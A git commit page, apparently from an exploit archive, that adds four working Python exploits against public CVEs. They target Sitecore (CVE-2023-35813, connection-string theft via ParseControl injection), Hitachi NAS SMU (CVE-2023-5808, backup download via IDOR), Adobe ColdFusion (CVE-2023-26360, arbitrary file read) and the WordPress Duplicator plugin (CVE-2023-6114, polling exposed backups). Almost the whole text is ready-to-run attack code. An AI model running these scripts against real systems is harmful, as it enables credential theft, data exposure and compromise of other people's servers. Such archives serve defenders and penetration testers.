Merge remote-tracking branch 'upstream/main'

CERTCC · Mar 12, 2024 · 356e4e2 · 356e4e2
2 parents 4b133f1 + ce58678
commit 356e4e2
Show file tree

Hide file tree

Showing 7 changed files with 457 additions and 0 deletions.
diff --git a/exploits/aspx/webapps/51876.py b/exploits/aspx/webapps/51876.py
@@ -0,0 +1,102 @@
+#!/usr/bin/env python3
+#
+# Exploit Title: Sitecore - Remote Code Execution v8.2
+# Exploit Author: abhishek morla
+# Google Dork: N/A
+# Date: 2024-01-08
+# Vendor Homepage: https://www.sitecore.com/
+# Software Link: https://dev.sitecore.net/
+# Version: 10.3
+# Tested on: windows64bit / mozila firefox
+# CVE : CVE-2023-35813
+# The vulnerability impacts all Experience Platform topologies (XM, XP, XC) from 9.0 Initial Release to 10.3 Initial Release; 8.2 is also impacted
+# Blog : https://medium.com/@abhishekmorla/uncovering-cve-2023-35813-retrieving-core-connection-strings-in-sitecore-5502148fce09
+# Video POC : https://youtu.be/vWKl9wgdTB0
+
+import argparse
+import requests
+from urllib.parse import quote
+from rich.console import Console
+
+console = Console()
+def initial_test(hostname):
+    # Initial payload to test vulnerability
+    test_payload = '''
+    <%@Register
+        TagPrefix = 'x'
+        Namespace = 'System.Runtime.Remoting.Services'
+        Assembly = 'System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'
+    %>
+    <x:RemotingService runat='server'
+    Context-Response-ContentType='TestVulnerability'
+    />
+    '''
+    encoded_payload = quote(test_payload)
+
+    url = f"https://{hostname}/sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index"
+    headers = {"Content-Type": "application/x-www-form-urlencoded"}
+    data = "__ISEVENT=1&__SOURCE=&__PARAMETERS=ParseControl(\"{}\")".format(encoded_payload)
+
+    response = requests.post(url, headers=headers, data=data, verify=False)
+
+    # Check for the test string in the Content-Type of the response
+    return 'TestVulnerability' in response.headers.get('Content-Type', '')
+
+def get_payload(choice):
+    # Payload templates for different options
+    payloads = {
+        '1': "<%$ ConnectionStrings:core %>",
+        '2': "<%$ ConnectionStrings:master %>",
+        '3': "<%$ ConnectionStrings:web %>"
+    }
+
+    base_payload = '''
+    <%@Register
+        TagPrefix = 'x'
+        Namespace = 'System.Runtime.Remoting.Services'
+        Assembly = 'System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'
+    %>
+    <x:RemotingService runat='server'
+    Context-Response-ContentType='{}'
+    />
+    '''
+
+    return base_payload.format(payloads.get(choice, "Invalid"))
+
+def main(hostname):
+    if initial_test(hostname):
+        print("Exploiting, Please wait...")
+        console.print("[bold green]The target appears to be vulnerable. Proceed with payload selection.[/bold green]")
+        print("Select the payload to use:")
+        print("1: Core connection strings")
+        print("2: Master connection strings")
+        print("3: Web connection strings")
+        payload_choice = input("Enter your choice (1, 2, or 3): ")
+
+        payload = get_payload(payload_choice)
+        encoded_payload = quote(payload)
+
+        url = f"http://{hostname}/sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index"
+        headers = {"Content-Type": "application/x-www-form-urlencoded"}
+        data = "__ISEVENT=1&__SOURCE=&__PARAMETERS=ParseControl(\"{}\")".format(encoded_payload)
+
+        response = requests.post(url, headers=headers, data=data)
+
+        if 'Content-Type' in response.headers:
+            print("Content-Type from the response header:")
+            print("\n")
+            print(response.headers['Content-Type'])
+        else:
+            print("No Content-Type in the response header. Status Code:", response.status_code)
+    else:
+        print("The target does not appear to be vulnerable to CVE-2023-35813.")
+
+
+if __name__ == "__main__":
+    console.print("[bold green]Author: Abhishek Morla[/bold green]")
+    console.print("[bold red]CVE-2023-35813[/bold red]")
+    parser = argparse.ArgumentParser(description='Test for CVE-2023-35813 vulnerability in Sitecore')
+    parser.add_argument('hostname', type=str, help='Hostname of the target Sitecore instance')
+    args = parser.parse_args()
+
+    main(args.hostname)
diff --git a/exploits/hardware/webapps/51872.py b/exploits/hardware/webapps/51872.py
@@ -0,0 +1,87 @@
+#!/usr/bin/python3
+#
+# Title:            Hitachi NAS (HNAS) System Management Unit (SMU) Backup & Restore IDOR Vulnerability
+# CVE:              CVE-2023-5808
+# Date:             2023-12-13
+# Exploit Author:   Arslan Masood (@arszilla)
+# Vendor:           https://www.hitachivantara.com/
+# Version:          < 14.8.7825.01
+# Tested On:        13.9.7021.04
+
+import argparse
+from datetime import datetime
+from os import getcwd
+
+import requests
+
+parser = argparse.ArgumentParser(
+    description="CVE-2023-5808 PoC",
+    usage="./CVE-2023-5808.py --host <Hostname/FQDN/IP> --id <JSESSIONID> --sso <JSESSIONIDSSO>"
+    )
+
+# Create --host argument:
+parser.add_argument(
+    "--host",
+    required=True,
+    type=str,
+    help="Hostname/FQDN/IP Address. Provide the port, if necessary, i.e. 127.0.0.1:8443, example.com:8443"
+    )
+
+# Create --id argument:
+parser.add_argument(
+    "--id",
+    required=True,
+    type=str,
+    help="JSESSIONID cookie value"
+    )
+
+# Create --sso argument:
+parser.add_argument(
+    "--sso",
+    required=True,
+    type=str,
+    help="JSESSIONIDSSO cookie value"
+    )
+
+args = parser.parse_args()
+
+def download_file(hostname, jsessionid, jsessionidsso):
+    # Set the filename:
+    filename = f"smu_backup-{datetime.now().strftime('%Y-%m-%d_%H%M')}.zip"
+
+    # Vulnerable SMU URL:
+    smu_url = f"https://{hostname}/mgr/app/template/simple%2CBackupSmuScreen.vm/password/"
+
+    # GET request cookies
+    smu_cookies = {
+        "JSESSIONID":       jsessionid,
+        "JSESSIONIDSSO":    jsessionidsso
+        }
+
+    # GET request headers:
+    smu_headers = {
+        "User-Agent":                   "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0",
+        "Accept":                       "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
+        "Accept-Language":              "en-US,en;q=0.5",
+        "Accept-Encoding":              "gzip, deflate",
+        "Dnt":                          "1",
+        "Referer":                      f"https://{hostname}/mgr/app/action/admin.SmuBackupRestoreAction/eventsubmit_doperform/ignored",
+        "Upgrade-Insecure-Requests":    "1",
+        "Sec-Fetch-Dest":               "document",
+        "Sec-Fetch-Mode":               "navigate",
+        "Sec-Fetch-Site":               "same-origin",
+        "Sec-Fetch-User":               "?1",
+        "Te":                           "trailers",
+        "Connection":                   "close"
+        }
+
+    # Send the request:
+    with requests.get(smu_url, headers=smu_headers, cookies=smu_cookies, stream=True, verify=False) as file_download:
+        with open(filename, 'wb') as backup_archive:
+            # Write the zip file to the CWD:
+            backup_archive.write(file_download.content)
+
+    print(f"{filename} has been downloaded to {getcwd()}")
+
+if __name__ == "__main__":
+    download_file(args.host, args.id, args.sso)
diff --git a/exploits/multiple/webapps/51875.py b/exploits/multiple/webapps/51875.py
@@ -0,0 +1,81 @@
+# Exploit Title: File Read Arbitrary Exploit for CVE-2023-26360
+# Google Dork: [not]
+# Date: [12/28/2023]
+# Exploit Author: [Youssef Muhammad]
+# Vendor Homepage: [
+https://helpx.adobe.com/coldfusion/kb/coldfusion-downloads.html]
+# Software Link: [
+https://drive.google.com/drive/folders/17ryBnFhswxiE1sHrNByxMVPKfUnwqmp0]
+# Version: [Adobe ColdFusion versions 2018,15 (and earlier) and 2021,5 and
+earlier]
+# Tested on: [Windows, Linux]
+# CVE : [CVE-2023-26360]
+
+import sys
+import requests
+import json
+
+BANNER = """
+   ██████ ██    ██ ███████       ██████   ██████  ██████  ██████        ██████   ██████  ██████   ██████   ██████
+  ██      ██    ██ ██                 ██ ██  ████      ██      ██            ██ ██            ██ ██       ██  ████
+  ██      ██    ██ █████   █████  █████  ██ ██ ██  █████   █████  █████  █████  ███████   █████  ███████  ██ ██ ██
+  ██       ██  ██  ██            ██      ████  ██ ██           ██       ██      ██    ██      ██ ██    ██ ████  ██
+   ██████   ████   ███████       ███████  ██████  ███████ ██████        ███████  ██████  ██████   ██████   ██████
+"""
+
+RED_COLOR = "\033[91m"
+GREEN_COLOR = "\032[42m"
+RESET_COLOR = "\033[0m"
+
+def print_banner():
+    print(RED_COLOR + BANNER + "                  Developed by SecureLayer7" + RESET_COLOR)
+    return 0
+
+def run_exploit(host, target_file, endpoint="/CFIDE/wizards/common/utils.cfc", proxy_url=None):
+    if not endpoint.endswith('.cfc'):
+        endpoint += '.cfc'
+
+    if target_file.endswith('.cfc'):
+        raise ValueError('The TARGET_FILE must not point to a .cfc')
+
+    targeted_file = f"a/{target_file}"
+    json_variables = json.dumps({"_metadata": {"classname": targeted_file}, "_variables": []})
+
+    vars_get = {'method': 'test', '_cfclient': 'true'}
+    uri = f'{host}{endpoint}'
+
+    response = requests.post(uri, params=vars_get, data={'_variables': json_variables}, proxies={'http': proxy_url, 'https': proxy_url} if proxy_url else None)
+
+    file_data = None
+    splatter = '<!-- " ---></TD></TD></TD></TH></TH></TH>'
+
+    if response.status_code in [404, 500] and splatter in response.text:
+        file_data = response.text.split(splatter, 1)[0]
+
+    if file_data is None:
+        raise ValueError('Failed to read the file. Ensure the CFC_ENDPOINT, CFC_METHOD, and CFC_METHOD_PARAMETERS are set correctly, and that the endpoint is accessible.')
+
+    print(file_data)
+
+    # Save the output to a file
+    output_file_name = 'output.txt'
+    with open(output_file_name, 'w') as output_file:
+        output_file.write(file_data)
+        print(f"The output saved to {output_file_name}")
+
+if __name__ == "__main__":
+    if not 3 <= len(sys.argv) <= 5:
+        print("Usage: python3 script.py <host> <target_file> [endpoint] [proxy_url]")
+        sys.exit(1)
+
+    print_banner()
+
+    host = sys.argv[1]
+    target_file = sys.argv[2]
+    endpoint = sys.argv[3] if len(sys.argv) > 3 else "/CFIDE/wizards/common/utils.cfc"
+    proxy_url = sys.argv[4] if len(sys.argv) > 4 else None
+
+    try:
+        run_exploit(host, target_file, endpoint, proxy_url)
+    except Exception as e:
+        print(f"Error: {e}")
diff --git a/exploits/php/webapps/51874.py b/exploits/php/webapps/51874.py
@@ -0,0 +1,99 @@
+# Exploit Title: WordPress Plugin Duplicator < 1.5.7.1 -
+Unauthenticated Sensitive Data Exposure to Account Takeover
+# Google Dork: inurl:("plugins/duplicator/")
+# Date: 2023-12-04
+# Exploit Author: Dmitrii Ignatyev
+# Vendor Homepage:
+https://duplicator.com/?utm_source=duplicator_free&utm_medium=wp_org&utm_content=desc_details&utm_campaign=duplicator_free
+# Software Link: https://wordpress.org/plugins/duplicator/
+# Version: 1.5.7.1
+# Tested on: Wordpress 6.4
+# CVE : CVE-2023-6114# CVE-Link :
+https://wpscan.com/vulnerability/5c5d41b9-1463-4a9b-862f-e9ee600ef8e1/
+
+# CVE-Link : https://research.cleantalk.org/cve-2023-6114-duplicator-poc-exploit/A
+severe vulnerability has been discovered in the directory
+*/wordpress/wp-content/backups-dup-lite/tmp/*. This flaw not only
+exposes extensive information about the site, including its
+configuration, directories, and files, but more critically, it
+provides unauthorized access to sensitive data within the database and
+all data inside. Exploiting this vulnerability poses an imminent
+threat, leading to potential *brute force attacks on password hashes
+and, subsequently, the compromise of the entire system*.*
+POC*:
+
+1) It is necessary that either the administrator or auto-backup works
+automatically at the scheduled time
+
+2) Exploit will send file search requests every 5 seconds
+
+3) I attack the site with this vulnerability using an exploit
+
+Exploit sends a request to the server every 5 seconds along the path
+“*http://your_site/wordpress/wp-content/backups-dup-lite/tmp/
+<http://your_site/wordpress/wp-content/backups-dup-lite/tmp/>”* and if
+it finds something in the index of, it instantly parses all the data
+and displays it on the screen
+
+Exploit (python3):
+
+import requests
+from bs4 import BeautifulSoup
+import re
+import time
+
+url = "http://127.0.0.1/wordpress/wp-content/backups-dup-lite/tmp/"
+processed_files = set()
+
+def get_file_names(url):
+    response = requests.get(url)
+
+    if response.status_code == 200 and len(response.text) > 0:
+        soup = BeautifulSoup(response.text, 'html.parser')
+        links = soup.find_all('a')
+
+        file_names = []
+        for link in links:
+            file_name = link.get('href')
+            if file_name != "../" and not file_name.startswith("?"):
+                file_names.append(file_name)
+
+        return file_names
+    return []
+
+def get_file_content(url, file_name):
+    file_url = url + file_name
+
+
+    if re.search(r'\.zip(?:\.|$)', file_name, re.IGNORECASE):
+        print(f"Ignoring file: {file_name}")
+        return None
+
+    file_response = requests.get(file_url)
+
+    if file_response.status_code == 200:
+        return file_response.text
+    return None
+
+while True:
+    file_names = get_file_names(url)
+
+    if file_names:
+        print("File names on the page:")
+        for file_name in file_names:
+            if file_name not in processed_files:
+                print(file_name)
+                file_content = get_file_content(url, file_name)
+
+                if file_content is not None:
+                    print("File content:")
+                    print(file_content)
+                    processed_files.add(file_name)
+
+    time.sleep(5)
+
+
+
+--
+With best regards,
+Dmitrii Ignatyev, Penetration Tester